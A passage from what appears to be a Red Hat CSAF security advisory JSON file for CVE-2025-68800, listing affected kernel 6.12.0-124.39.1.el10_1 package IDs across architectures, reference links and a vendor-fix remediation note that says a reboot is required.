"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "RHBZ#2429065",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429065"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68800"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68800-39d2@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68800-39d2@gregkh/T"
}
],
"release_date": "2026-01-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-25T02:10:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
